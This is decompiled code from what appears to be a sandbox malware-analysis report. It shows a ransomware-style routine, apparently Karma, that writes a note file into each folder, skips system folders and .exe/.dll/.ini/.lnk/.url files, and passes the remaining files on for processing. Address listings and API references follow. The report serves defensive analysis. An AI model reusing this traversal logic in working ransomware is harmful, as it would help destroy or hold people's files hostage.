					 *_t326 = _t219;
					_t431 =  &(_t431[2]);
				} while (_t219 != 0);
				_t221 = CreateFileW( &_v1564, 0xc0000000, 0, 0, 2, 0, 0); // executed
				_t508 = _t221;
				if(_t508 == 0) {
					L20:
					_t224 = FindFirstFileW( &_v524,  &_v2156); // executed
					_t294 = _t224;
					_v2160 = _t294;
					if(_t294 == 0xffffffff) {
						L139:
						return _t224;
					}
					do {
						if((_v2156.dwFileAttributes & 0x00000010) == 0) {
							_t328 =  &_v1044 - 2;
							_t433 = (_t485 -  &_v1044 >> 1) + 1 + (_t485 -  &_v1044 >> 1) + 1;
							do {
								_t229 =  *(_t433 + _t328) & 0x0000ffff;
								_t328 =  &(_t328[0]);
								 *_t328 = _t229;
							} while (_t229 != 0);
							_t329 =  &_v1044;
							_t434 =  &(_v2156.cFileName);
							asm("o16 nop [eax+eax]");
							do {
								_t230 =  *_t329 & 0x0000ffff;
								_t329 =  &(_t329[1]);
							} while (_t230 != 0);
							_t330 = _t329 - 4;
							do {
								_t231 =  *_t434 & 0x0000ffff;
								_t330 =  &(_t330[0]);
								 *_t330 = _t231;
								_t434 =  &(_t434[1]);
							} while (_t231 != 0);
							_t232 = _v2156.cFileName;
							_t331 =  &(_v2156.cFileName);
							_t510 = 0;
							if(_t232 == 0) {
								L104:
								_t436 =  &_v1564 - 2;
								_t332 =  !=  ? _t510 : _t331;
								_t333 = ( !=  ? _t510 : _t331) -  &_v1564;
								_t334 = ( !=  ? _t510 : _t331) -  &_v1564 >> 1;
								_t335 = (( !=  ? _t510 : _t331) -  &_v1564 >> 1) + 1;
								_t336 = (( !=  ? _t510 : _t331) -  &_v1564 >> 1) + 1 + (( !=  ? _t510 : _t331) -  &_v1564 >> 1) + 1;
								asm("o16 nop [eax+eax]");
								do {
									_t234 =  *(_t336 + _t436) & 0x0000ffff;
									_t436 =  &(_t436[0]);
									 *_t436 = _t234;
								} while (_t234 != 0);
								_t487 = 0;
								while(1) {
									_t159 = _t487 + L".exe"; // 0x2e0000
									_t337 =  *_t159 & 0x0000ffff;
									_t296 =  *(_t534 + _t487 + 0x268) & 0x0000ffff;
									_t511 = _t296;
									_t163 = _t337 + 0x20; // 0x2e0020
									_t438 =  >  ?  *_t159 & 0x0000ffff : _t163;
									_t339 =  >  ? _t511 : _t511 + 0x20;
									_t340 = ( >  ? _t511 : _t511 + 0x20) != ( >  ?  *_t159 & 0x0000ffff : _t163);
									__eflags = ( >  ? _t511 : _t511 + 0x20) != ( >  ?  *_t159 & 0x0000ffff : _t163);
									if(( >  ? _t511 : _t511 + 0x20) != ( >  ?  *_t159 & 0x0000ffff : _t163)) {
										break;
									}
									if(_t296 == 0) {
										L136:
										_t485 = _v2168;
										goto L137;
									}
									_t487 = _t487 + 2;
								}
								_t488 = 0;
								while(1) {
									_t166 = _t488 + L".ini"; // 0x2e0000
									_t341 =  *_t166 & 0x0000ffff;
									_t297 =  *(_t534 + _t488 + 0x268) & 0x0000ffff;
									_t512 = _t297;
									_t170 = _t341 + 0x20; // 0x2e0020
									_t440 =  >  ?  *_t166 & 0x0000ffff : _t170;
									_t343 =  >  ? _t512 : _t512 + 0x20;
									_t344 = ( >  ? _t512 : _t512 + 0x20) != ( >  ?  *_t166 & 0x0000ffff : _t170);
									__eflags = ( >  ? _t512 : _t512 + 0x20) != ( >  ?  *_t166 & 0x0000ffff : _t170);
									if(( >  ? _t512 : _t512 + 0x20) != ( >  ?  *_t166 & 0x0000ffff : _t170)) {
										break;
									}
									if(_t297 == 0) {
										goto L136;
									}
									_t488 = _t488 + 2;
								}
								_t489 = 0;
								while(1) {
									_t173 = _t489 + L".dll"; // 0x2e0000
									_t345 =  *_t173 & 0x0000ffff;
									_t298 =  *(_t534 + _t489 + 0x268) & 0x0000ffff;
									_t513 = _t298;
									_t177 = _t345 + 0x20; // 0x2e0020
									_t442 =  >  ?  *_t173 & 0x0000ffff : _t177;
									_t347 =  >  ? _t513 : _t513 + 0x20;
									_t348 = ( >  ? _t513 : _t513 + 0x20) != ( >  ?  *_t173 & 0x0000ffff : _t177);
									__eflags = ( >  ? _t513 : _t513 + 0x20) != ( >  ?  *_t173 & 0x0000ffff : _t177);
									if(( >  ? _t513 : _t513 + 0x20) != ( >  ?  *_t173 & 0x0000ffff : _t177)) {
										break;
									}
									if(_t298 == 0) {
										goto L136;
									}
									_t489 = _t489 + 2;
								}
								_t490 = 0;
								while(1) {
									_t180 = _t490 + L".url"; // 0x2e0000
									_t349 =  *_t180 & 0x0000ffff;
									_t299 =  *(_t534 + _t490 + 0x268) & 0x0000ffff;
									_t514 = _t299;
									_t184 = _t349 + 0x20; // 0x2e0020
									_t444 =  >  ?  *_t180 & 0x0000ffff : _t184;
									_t351 =  >  ? _t514 : _t514 + 0x20;
									_t352 = ( >  ? _t514 : _t514 + 0x20) != ( >  ?  *_t180 & 0x0000ffff : _t184);
									__eflags = ( >  ? _t514 : _t514 + 0x20) != ( >  ?  *_t180 & 0x0000ffff : _t184);
									if(( >  ? _t514 : _t514 + 0x20) != ( >  ?  *_t180 & 0x0000ffff : _t184)) {
										break;
									}
									if(_t299 == 0) {
										goto L136;
									}
									_t490 = _t490 + 2;
								}
								_t491 = 0;
								while(1) {
									_t187 = _t491 + L".lnk"; // 0x2e0000
									_t353 =  *_t187 & 0x0000ffff;
									_t300 =  *(_t534 + _t491 + 0x268) & 0x0000ffff;
									_t515 = _t300;
									_t191 = _t353 + 0x20; // 0x2e0020
									_t446 =  >  ?  *_t187 & 0x0000ffff : _t191;
									_t355 =  >  ? _t515 : _t515 + 0x20;
									_t356 = ( >  ? _t515 : _t515 + 0x20) != ( >  ?  *_t187 & 0x0000ffff : _t191);
									__eflags = ( >  ? _t515 : _t515 + 0x20) != ( >  ?  *_t187 & 0x0000ffff : _t191);
									if(( >  ? _t515 : _t515 + 0x20) != ( >  ?  *_t187 & 0x0000ffff : _t191)) {
										break;
									}
									if(_t300 == 0) {
										goto L136;
									}
									_t491 = _t491 + 2;
								}
								_t492 =  &(_v2156.cFileName);
								if(L"KARMA" == 0) {
									goto L136;
								}
								_t285 = _v2156.cFileName;
								if(_t285 == 0) {
									L135:
									E004021B0(L"[+] File: ",  &_v1044); // executed
									E00402760( &_v1044); // executed
									goto L136;
								}
								_t422 = _t285 & 0x0000ffff;
								_t531 = _t492 - L"KARMA";
								do {
									_t288 = L"KARMA";
									if(_t422 == 0) {
										L133:
										if( *_t288 == 0) {
											goto L136;
										}
										goto L134;
									} else {
										goto L130;
									}
									while(1) {
										L130:
										_t423 =  *_t288 & 0x0000ffff;
										if(_t423 == 0) {
											goto L136;
										}
										_t481 = ( *(_t531 + _t288) & 0x0000ffff) - _t423;
										if(_t481 != 0) {
											goto L133;
										}
										_t288 =  &(_t288[2]);
										if( *(_t531 + _t288) != _t481) {
											continue;
										}
										goto L133;
									}
									goto L136;
									L134:
									_t422 =  *(_t492 + 2) & 0x0000ffff;
									_t492 = _t492 + 2;
									_t531 = _t531 + 2;
								} while (_t422 != 0);
								goto L135;
							}
							_t482 = _t232 & 0x0000ffff;
							do {
								if(_t482 == 0x5c || _t482 == 0x20) {
									_t510 = 0;
								} else {
									if(_t482 == 0x2e) {
										_t510 = _t331;
									}
								}
								_t289 =  *(_t331 + 2) & 0x0000ffff;
								_t331 = _t331 + 2;
								_t482 = _t289;
							} while (_t289 != 0);
							goto L104;
						}
						_t493 = 0;
						while(1) {
							_t31 = _t493 + "."; // 0x2e0000
							_t357 =  *_t31 & 0x0000ffff;
							_t302 =  *(_t534 + _t493 + 0x44) & 0x0000ffff;
							_t516 = _t302;
							_t35 = _t357 + 0x20; // 0x2e0020
							_t448 =  >  ?  *_t31 & 0x0000ffff : _t35;
							_t359 =  >  ? _t516 : _t516 + 0x20;
							_t360 = ( >  ? _t516 : _t516 + 0x20) != ( >  ?  *_t31 & 0x0000ffff : _t35);
							_t556 = ( >  ? _t516 : _t516 + 0x20) != ( >  ?  *_t31 & 0x0000ffff : _t35);
							if(( >  ? _t516 : _t516 + 0x20) != ( >  ?  *_t31 & 0x0000ffff : _t35)) {
								break;
							}
							if(_t302 == 0) {
								goto L136;
							}
							_t493 = _t493 + 2;
						}
						_t494 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t38 = _t494 + L".."; // 0x2e0000
							_t361 =  *_t38 & 0x0000ffff;
							_t303 =  *(_t534 + _t494 + 0x44) & 0x0000ffff;
							_t517 = _t303;
							_t42 = _t361 + 0x20; // 0x2e0020
							_t450 =  >  ?  *_t38 & 0x0000ffff : _t42;
							_t363 =  >  ? _t517 : _t517 + 0x20;
							_t364 = ( >  ? _t517 : _t517 + 0x20) != ( >  ?  *_t38 & 0x0000ffff : _t42);
							__eflags = ( >  ? _t517 : _t517 + 0x20) != ( >  ?  *_t38 & 0x0000ffff : _t42);
							if(( >  ? _t517 : _t517 + 0x20) != ( >  ?  *_t38 & 0x0000ffff : _t42)) {
								break;
							}
							if(_t303 == 0) {
								goto L136;
							}
							_t494 = _t494 + 2;
						}
						_t495 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t45 = _t495 + L"windows"; // 0x770000
							_t365 =  *_t45 & 0x0000ffff;
							_t304 =  *(_t534 + _t495 + 0x44) & 0x0000ffff;
							_t518 = _t304;
							_t49 = _t365 + 0x20; // 0x770020
							_t452 =  >  ?  *_t45 & 0x0000ffff : _t49;
							_t367 =  >  ? _t518 : _t518 + 0x20;
							_t368 = ( >  ? _t518 : _t518 + 0x20) != ( >  ?  *_t45 & 0x0000ffff : _t49);
							__eflags = ( >  ? _t518 : _t518 + 0x20) != ( >  ?  *_t45 & 0x0000ffff : _t49);
							if(( >  ? _t518 : _t518 + 0x20) != ( >  ?  *_t45 & 0x0000ffff : _t49)) {
								break;
							}
							if(_t304 == 0) {
								goto L136;
							}
							_t495 = _t495 + 2;
						}
						_t496 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t52 = _t496 + L"$recycle.bin"; // 0x240000
							_t369 =  *_t52 & 0x0000ffff;
							_t305 =  *(_t534 + _t496 + 0x44) & 0x0000ffff;
							_t519 = _t305;
							_t56 = _t369 + 0x20; // 0x240020
							_t454 =  >  ?  *_t52 & 0x0000ffff : _t56;
							_t371 =  >  ? _t519 : _t519 + 0x20;
							_t372 = ( >  ? _t519 : _t519 + 0x20) != ( >  ?  *_t52 & 0x0000ffff : _t56);
							__eflags = ( >  ? _t519 : _t519 + 0x20) != ( >  ?  *_t52 & 0x0000ffff : _t56);
							if(( >  ? _t519 : _t519 + 0x20) != ( >  ?  *_t52 & 0x0000ffff : _t56)) {
								break;
							}
							if(_t305 == 0) {
								goto L136;
							}
							_t496 = _t496 + 2;
						}
						_t497 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t59 = _t497 + L"all users"; // 0x610000
							_t373 =  *_t59 & 0x0000ffff;
							_t306 =  *(_t534 + _t497 + 0x44) & 0x0000ffff;
							_t520 = _t306;
							_t63 = _t373 + 0x20; // 0x610020
							_t456 =  >  ?  *_t59 & 0x0000ffff : _t63;
							_t375 =  >  ? _t520 : _t520 + 0x20;
							_t376 = ( >  ? _t520 : _t520 + 0x20) != ( >  ?  *_t59 & 0x0000ffff : _t63);
							__eflags = ( >  ? _t520 : _t520 + 0x20) != ( >  ?  *_t59 & 0x0000ffff : _t63);
							if(( >  ? _t520 : _t520 + 0x20) != ( >  ?  *_t59 & 0x0000ffff : _t63)) {
								break;
							}
							if(_t306 == 0) {
								goto L136;
							}
							_t497 = _t497 + 2;
						}
						_t498 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t66 = _t498 + L"default user"; // 0x640000
							_t377 =  *_t66 & 0x0000ffff;
							_t307 =  *(_t534 + _t498 + 0x44) & 0x0000ffff;
							_t521 = _t307;
							_t70 = _t377 + 0x20; // 0x640020
							_t458 =  >  ?  *_t66 & 0x0000ffff : _t70;
							_t379 =  >  ? _t521 : _t521 + 0x20;
							_t380 = ( >  ? _t521 : _t521 + 0x20) != ( >  ?  *_t66 & 0x0000ffff : _t70);
							__eflags = ( >  ? _t521 : _t521 + 0x20) != ( >  ?  *_t66 & 0x0000ffff : _t70);
							if(( >  ? _t521 : _t521 + 0x20) != ( >  ?  *_t66 & 0x0000ffff : _t70)) {
								break;
							}
							if(_t307 == 0) {
								goto L136;
							}
							_t498 = _t498 + 2;
						}
						_t499 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t73 = _t499 + L"public"; // 0x700000
							_t381 =  *_t73 & 0x0000ffff;
							_t308 =  *(_t534 + _t499 + 0x44) & 0x0000ffff;
							_t522 = _t308;
							_t77 = _t381 + 0x20; // 0x700020
							_t460 =  >  ?  *_t73 & 0x0000ffff : _t77;
							_t383 =  >  ? _t522 : _t522 + 0x20;
							_t384 = ( >  ? _t522 : _t522 + 0x20) != ( >  ?  *_t73 & 0x0000ffff : _t77);
							__eflags = ( >  ? _t522 : _t522 + 0x20) != ( >  ?  *_t73 & 0x0000ffff : _t77);
							if(( >  ? _t522 : _t522 + 0x20) != ( >  ?  *_t73 & 0x0000ffff : _t77)) {
								break;
							}
							if(_t308 == 0) {
								goto L136;
							}
							_t499 = _t499 + 2;
						}
						_t500 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t80 = _t500 + L"programdata"; // 0x700000
							_t385 =  *_t80 & 0x0000ffff;
							_t309 =  *(_t534 + _t500 + 0x44) & 0x0000ffff;
							_t523 = _t309;
							_t84 = _t385 + 0x20; // 0x700020
							_t462 =  >  ?  *_t80 & 0x0000ffff : _t84;
							_t387 =  >  ? _t523 : _t523 + 0x20;
							_t388 = ( >  ? _t523 : _t523 + 0x20) != ( >  ?  *_t80 & 0x0000ffff : _t84);
							__eflags = ( >  ? _t523 : _t523 + 0x20) != ( >  ?  *_t80 & 0x0000ffff : _t84);
							if(( >  ? _t523 : _t523 + 0x20) != ( >  ?  *_t80 & 0x0000ffff : _t84)) {
								break;
							}
							if(_t309 == 0) {
								goto L136;
							}
							_t500 = _t500 + 2;
						}
						_t501 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t87 = _t501 + L"appdata"; // 0x610000
							_t389 =  *_t87 & 0x0000ffff;
							_t310 =  *(_t534 + _t501 + 0x44) & 0x0000ffff;
							_t524 = _t310;
							_t91 = _t389 + 0x20; // 0x610020
							_t464 =  >  ?  *_t87 & 0x0000ffff : _t91;
							_t391 =  >  ? _t524 : _t524 + 0x20;
							_t392 = ( >  ? _t524 : _t524 + 0x20) != ( >  ?  *_t87 & 0x0000ffff : _t91);
							__eflags = ( >  ? _t524 : _t524 + 0x20) != ( >  ?  *_t87 & 0x0000ffff : _t91);
							if(( >  ? _t524 : _t524 + 0x20) != ( >  ?  *_t87 & 0x0000ffff : _t91)) {
								break;
							}
							if(_t310 == 0) {
								goto L136;
							}
							_t501 = _t501 + 2;
						}
						_t502 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t94 = _t502 + L"program files"; // 0x700000
							_t393 =  *_t94 & 0x0000ffff;
							_t311 =  *(_t534 + _t502 + 0x44) & 0x0000ffff;
							_t525 = _t311;
							_t98 = _t393 + 0x20; // 0x700020
							_t466 =  >  ?  *_t94 & 0x0000ffff : _t98;
							_t395 =  >  ? _t525 : _t525 + 0x20;
							_t396 = ( >  ? _t525 : _t525 + 0x20) != ( >  ?  *_t94 & 0x0000ffff : _t98);
							__eflags = ( >  ? _t525 : _t525 + 0x20) != ( >  ?  *_t94 & 0x0000ffff : _t98);
							if(( >  ? _t525 : _t525 + 0x20) != ( >  ?  *_t94 & 0x0000ffff : _t98)) {
								break;
							}
							if(_t311 == 0) {
								goto L136;
							}
							_t502 = _t502 + 2;
						}
						_t503 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t101 = _t503 + L"program files (x86)"; // 0x700000
							_t397 =  *_t101 & 0x0000ffff;
							_t312 =  *(_t534 + _t503 + 0x44) & 0x0000ffff;
							_t526 = _t312;
							_t105 = _t397 + 0x20; // 0x700020
							_t468 =  >  ?  *_t101 & 0x0000ffff : _t105;
							_t399 =  >  ? _t526 : _t526 + 0x20;
							_t400 = ( >  ? _t526 : _t526 + 0x20) != ( >  ?  *_t101 & 0x0000ffff : _t105);
							__eflags = ( >  ? _t526 : _t526 + 0x20) != ( >  ?  *_t101 & 0x0000ffff : _t105);
							if(( >  ? _t526 : _t526 + 0x20) != ( >  ?  *_t101 & 0x0000ffff : _t105)) {
								break;
							}
							if(_t312 == 0) {
								goto L136;
							}
							_t503 = _t503 + 2;
						}
						_t504 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t108 = _t504 + L"default"; // 0x640000
							_t401 =  *_t108 & 0x0000ffff;
							_t313 =  *(_t534 + _t504 + 0x44) & 0x0000ffff;
							_t527 = _t313;
							_t112 = _t401 + 0x20; // 0x640020
							_t470 =  >  ?  *_t108 & 0x0000ffff : _t112;
							_t403 =  >  ? _t527 : _t527 + 0x20;
							_t404 = ( >  ? _t527 : _t527 + 0x20) != ( >  ?  *_t108 & 0x0000ffff : _t112);
							__eflags = ( >  ? _t527 : _t527 + 0x20) != ( >  ?  *_t108 & 0x0000ffff : _t112);
							if(( >  ? _t527 : _t527 + 0x20) != ( >  ?  *_t108 & 0x0000ffff : _t112)) {
								break;
							}
							if(_t313 == 0) {
								goto L136;
							}
							_t504 = _t504 + 2;
						}
						_t505 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t115 = _t505 + L"system volume insformation"; // 0x730000
							_t405 =  *_t115 & 0x0000ffff;
							_t314 =  *(_t534 + _t505 + 0x44) & 0x0000ffff;
							_t528 = _t314;
							_t119 = _t405 + 0x20; // 0x730020
							_t472 =  >  ?  *_t115 & 0x0000ffff : _t119;
							_t407 =  >  ? _t528 : _t528 + 0x20;
							_t408 = ( >  ? _t528 : _t528 + 0x20) != ( >  ?  *_t115 & 0x0000ffff : _t119);
							__eflags = ( >  ? _t528 : _t528 + 0x20) != ( >  ?  *_t115 & 0x0000ffff : _t119);
							if(( >  ? _t528 : _t528 + 0x20) != ( >  ?  *_t115 & 0x0000ffff : _t119)) {
								break;
							}
							if(_t314 == 0) {
								goto L136;
							}
							_t505 = _t505 + 2;
						}
						_t506 = 0;
						asm("o16 nop [eax+eax]");
						while(1) {
							_t122 = _t506 + L"searches"; // 0x730000
							_t409 =  *_t122 & 0x0000ffff;
							_t315 =  *(_t534 + _t506 + 0x44) & 0x0000ffff;
							_t529 = _t315;
							_t126 = _t409 + 0x20; // 0x730020
							_t474 =  >  ?  *_t122 & 0x0000ffff : _t126;
							_t411 =  >  ? _t529 : _t529 + 0x20;
							_t412 = ( >  ? _t529 : _t529 + 0x20) != ( >  ?  *_t122 & 0x0000ffff : _t126);
							__eflags = ( >  ? _t529 : _t529 + 0x20) != ( >  ?  *_t122 & 0x0000ffff : _t126);
							if(( >  ? _t529 : _t529 + 0x20) != ( >  ?  *_t122 & 0x0000ffff : _t126)) {
								break;
							}
							if(_t315 == 0) {
								goto L136;
							}
							_t506 = _t506 + 2;
						}
						_t485 = _v2168;
						_t414 =  &_v1564 - 2;
						_t476 = (_t485 -  &_v1564 >> 1) + 1 + (_t485 -  &_v1564 >> 1) + 1;
						asm("o16 nop [eax+eax]");
						do {
							_t279 =  *(_t476 + _t414) & 0x0000ffff;
							_t414 =  &(_t414[0]);
							 *_t414 = _t279;
						} while (_t279 != 0);
						_t415 =  &_v1564;
						_t477 =  &(_v2156.cFileName);
						asm("o16 nop [eax+eax]");
						do {
							_t280 =  *_t415 & 0x0000ffff;
							_t415 =  &(_t415[1]);
						} while (_t280 != 0);
						_t416 = _t415 - 4;
						do {
							_t281 =  *_t477 & 0x0000ffff;
							_t416 =  &(_t416[0]);
							 *_t416 = _t281;
							_t477 =  &(_t477[1]);
						} while (_t281 != 0);
						_t417 =  &_v1564;
						_t478 = "\\";
						do {
							_t282 =  *_t417 & 0x0000ffff;
							_t417 =  &(_t417[1]);
						} while (_t282 != 0);
						_t418 = _t417 - 4;
						do {
							_t283 =  *_t478 & 0x0000ffff;
							_t418 =  &(_t418[0]);
							 *_t418 = _t283;
							_t141 =  &(_t478[2]); // 0x5b0000
							_t478 = _t141;
						} while (_t283 != 0);
						E00402D30( &_v1564); // executed
						L137:
						_t301 = _v2160;
						_t246 = FindNextFileW(_t301,  &_v2156); // executed
					} while (_t246 != 0);
					_t224 = FindClose(_t301); // executed
					goto L139;
				}
				_t483 =  *0x406008;
				_t424 = 0;
				_v2160 = 0;
				if( *_t483 == 0) {
					L19:
					WriteFile(_t508, _t483, _t424,  &_v2160, 0); // executed
					FindCloseChangeNotification(_t508); // executed
					goto L20;
				} else {
					goto L18;
				}
				do {
					L18:
					_t424 = _t424 + 1;
				} while ( *((char*)(_t483 + _t424)) != 0);
				goto L19;
			}






































































































































0x00402d36
0x00402d3f
0x00402d4f
0x00402d55
0x00402d5d
0x00402d60
0x00402d60
0x00402d64
0x00402d67
0x00402d6a
0x00402d6f
0x00402d76
0x00402d80
0x00402d80
0x00402d83
0x00402d86
0x00402d8b
0x00402d90
0x00402d90
0x00402d93
0x00402d96
0x00402d99
0x00402d9c
0x00402db5
0x00402db9
0x00402dc0
0x00402dc0
0x00402dc4
0x00402dc7
0x00402dca
0x00402dcf
0x00402dd6
0x00402de0
0x00402de0
0x00402de3
0x00402de6
0x00402deb
0x00402df0
0x00402df0
0x00402df3
0x00402df6
0x00402df9
0x00402dfc
0x00402e01
0x00402e08
0x00402e10
0x00402e10
0x00402e13
0x00402e16
0x00402e1b
0x00402e20
0x00402e20
0x00402e23
0x00402e26
0x00402e29
0x00402e2c
0x00402e48
0x00402e4e
0x00402e52
0x00402e86
0x00402e93
0x00402e99
0x00402e9b
0x00402ea2
0x00403592
0x00403598
0x00403598
0x00402eb0
0x00402eb5
0x004032f6
0x004032fa
0x00403300
0x00403300
0x00403304
0x00403307
0x0040330a
0x0040330f
0x00403316
0x0040331a
0x00403320
0x00403320
0x00403323
0x00403326
0x0040332b
0x00403330
0x00403330
0x00403333
0x00403336
0x00403339
0x0040333c
0x00403341
0x00403346
0x0040334a
0x0040334f
0x0040337a
0x00403381
0x0040338d
0x00403390
0x00403392
0x00403394
0x00403395
0x00403397
0x004033a0
0x004033a0
0x004033a4
0x004033a7
0x004033aa
0x004033af
0x004033b1
0x004033b1
0x004033b1
0x004033b8
0x004033c0
0x004033c8
0x004033ce
0x004033d7
0x004033da
0x004033da
0x004033dc
0x00000000
0x00000000
0x004033e1
0x0040356f
0x0040356f
0x00000000
0x0040356f
0x004033e7
0x004033e7
0x004033ec
0x004033f0
0x004033f0
0x004033f0
0x004033f7
0x004033ff
0x00403407
0x0040340d
0x00403416
0x00403419
0x00403419
0x0040341b
0x00000000
0x00000000
0x00403420
0x00000000
0x00000000
0x00403426
0x00403426
0x0040342b
0x00403430
0x00403430
0x00403430
0x00403437
0x0040343f
0x00403447
0x0040344d
0x00403456
0x00403459
0x00403459
0x0040345b
0x00000000
0x00000000
0x00403460
0x00000000
0x00000000
0x00403466
0x00403466
0x0040346b
0x00403470
0x00403470
0x00403470
0x00403477
0x0040347f
0x00403487
0x0040348d
0x00403496
0x00403499
0x00403499
0x0040349b
0x00000000
0x00000000
0x004034a0
0x00000000
0x00000000
0x004034a6
0x004034a6
0x004034ab
0x004034b0
0x004034b0
0x004034b0
0x004034b7
0x004034bf
0x004034c7
0x004034cd
0x004034d6
0x004034d9
0x004034d9
0x004034db
0x00000000
0x00000000
0x004034e0
0x00000000
0x00000000
0x004034e6
0x004034e6
0x004034f3
0x004034f7
0x00000000
0x00000000
0x004034fd
0x00403505
0x00403552
0x0040355e
0x0040356a
0x00000000
0x0040356a
0x0040350d
0x00403510
0x00403516
0x00403516
0x0040351e
0x0040353d
0x00403541
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00403520
0x00403520
0x00403520
0x00403526
0x00000000
0x00000000
0x00403530
0x00403532
0x00000000
0x00000000
0x00403534
0x0040353b
0x00000000
0x00000000
0x00000000
0x0040353b
0x00000000
0x00403543
0x00403543
0x00403547
0x0040354a
0x0040354d
0x00000000
0x00403516
0x00403351
0x00403354
0x00403358
0x0040336a
0x00403360
0x00403364
0x00403366
0x00403366
0x00403364
0x0040336c
0x00403370
0x00403373
0x00403375
0x00000000
0x00403354
0x00402ebb
0x00402ec0
0x00402ec0
0x00402ec0
0x00402ec7
0x00402ecc
0x00402ed4
0x00402eda
0x00402ee3
0x00402ee6
0x00402ee6
0x00402ee8
0x00000000
0x00000000
0x00402eed
0x00000000
0x00000000
0x00402ef3
0x00402ef3
0x00402ef8
0x00402efa
0x00402f00
0x00402f00
0x00402f00
0x00402f07
0x00402f0c
0x00402f14
0x00402f1a
0x00402f23
0x00402f26
0x00402f26
0x00402f28
0x00000000
0x00000000
0x00402f2d
0x00000000
0x00000000
0x00402f33
0x00402f33
0x00402f38
0x00402f3a
0x00402f40
0x00402f40
0x00402f40
0x00402f47
0x00402f4c
0x00402f54
0x00402f5a
0x00402f63
0x00402f66
0x00402f66
0x00402f68
0x00000000
0x00000000
0x00402f6d
0x00000000
0x00000000
0x00402f73
0x00402f73
0x00402f78
0x00402f7a
0x00402f80
0x00402f80
0x00402f80
0x00402f87
0x00402f8c
0x00402f94
0x00402f9a
0x00402fa3
0x00402fa6
0x00402fa6
0x00402fa8
0x00000000
0x00000000
0x00402fad
0x00000000
0x00000000
0x00402fb3
0x00402fb3
0x00402fb8
0x00402fba
0x00402fc0
0x00402fc0
0x00402fc0
0x00402fc7
0x00402fcc
0x00402fd4
0x00402fda
0x00402fe3
0x00402fe6
0x00402fe6
0x00402fe8
0x00000000
0x00000000
0x00402fed
0x00000000
0x00000000
0x00402ff3
0x00402ff3
0x00402ff8
0x00402ffa
0x00403000
0x00403000
0x00403000
0x00403007
0x0040300c
0x00403014
0x0040301a
0x00403023
0x00403026
0x00403026
0x00403028
0x00000000
0x00000000
0x0040302d
0x00000000
0x00000000
0x00403033
0x00403033
0x00403038
0x0040303a
0x00403040
0x00403040
0x00403040
0x00403047
0x0040304c
0x00403054
0x0040305a
0x00403063
0x00403066
0x00403066
0x00403068
0x00000000
0x00000000
0x0040306d
0x00000000
0x00000000
0x00403073
0x00403073
0x00403078
0x0040307a
0x00403080
0x00403080
0x00403080
0x00403087
0x0040308c
0x00403094
0x0040309a
0x004030a3
0x004030a6
0x004030a6
0x004030a8
0x00000000
0x00000000
0x004030ad
0x00000000
0x00000000
0x004030b3
0x004030b3
0x004030b8
0x004030ba
0x004030c0
0x004030c0
0x004030c0
0x004030c7
0x004030cc
0x004030d4
0x004030da
0x004030e3
0x004030e6
0x004030e6
0x004030e8
0x00000000
0x00000000
0x004030ed
0x00000000
0x00000000
0x004030f3
0x004030f3
0x004030f8
0x004030fa
0x00403100
0x00403100
0x00403100
0x00403107
0x0040310c
0x00403114
0x0040311a
0x00403123
0x00403126
0x00403126
0x00403128
0x00000000
0x00000000
0x0040312d
0x00000000
0x00000000
0x00403133
0x00403133
0x00403138
0x0040313a
0x00403140
0x00403140
0x00403140
0x00403147
0x0040314c
0x00403154
0x0040315a
0x00403163
0x00403166
0x00403166
0x00403168
0x00000000
0x00000000
0x0040316d
0x00000000
0x00000000
0x00403173
0x00403173
0x00403178
0x0040317a
0x00403180
0x00403180
0x00403180
0x00403187
0x0040318c
0x00403194
0x0040319a
0x004031a3
0x004031a6
0x004031a6
0x004031a8
0x00000000
0x00000000
0x004031ad
0x00000000
0x00000000
0x004031b3
0x004031b3
0x004031b8
0x004031ba
0x004031c0
0x004031c0
0x004031c0
0x004031c7
0x004031cc
0x004031d4
0x004031da
0x004031e3
0x004031e6
0x004031e6
0x004031e8
0x00000000
0x00000000
0x004031ed
0x00000000
0x00000000
0x004031f3
0x004031f3
0x004031f8
0x004031fa
0x00403200
0x00403200
0x00403200
0x00403207
0x0040320c
0x00403214
0x0040321a
0x00403223
0x00403226
0x00403226
0x00403228
0x00000000
0x00000000
0x0040322d
0x00000000
0x00000000
0x00403233
0x00403233
0x00403238
0x0040324e
0x00403254
0x00403257
0x00403260
0x00403260
0x00403264
0x00403267
0x0040326a
0x0040326f
0x00403276
0x0040327a
0x00403280
0x00403280
0x00403283
0x00403286
0x0040328b
0x00403290
0x00403290
0x00403293
0x00403296
0x00403299
0x0040329c
0x004032a1
0x004032a8
0x004032b0
0x004032b0
0x004032b3
0x004032b6
0x004032bb
0x004032c0
0x004032c0
0x004032c3
0x004032c6
0x004032c9
0x004032c9
0x004032cc
0x004032d8
0x00403573
0x00403573
0x0040357d
0x00403583
0x0040358c
0x00000000
0x0040358c
0x00402e54
0x00402e5a
0x00402e5c
0x00402e66
0x00402e6f
0x00402e79
0x00402e80
0x00000000
0x00000000
0x00000000
0x00000000
0x00402e68
0x00402e68
0x00402e68
0x00402e69
0x00000000

APIs
  • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000000,00000000,?,00000000), ref: 00402E48
  • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00402E79
  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00402E80
  • FindFirstFileW.KERNELBASE(?,?,?,00000000), ref: 00402E93
  • FindNextFileW.KERNELBASE(?,00000010), ref: 0040357D
  • FindClose.KERNELBASE(?), ref: 0040358C
Strings
Memory Dump Source
  • Source File: 00000000.00000002.224986040.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.224981936.0000000000400000.00000002.00020000.sdmp Download File
  • Associated: 00000000.00000002.224990586.0000000000404000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_pss.jbxd
Similarity
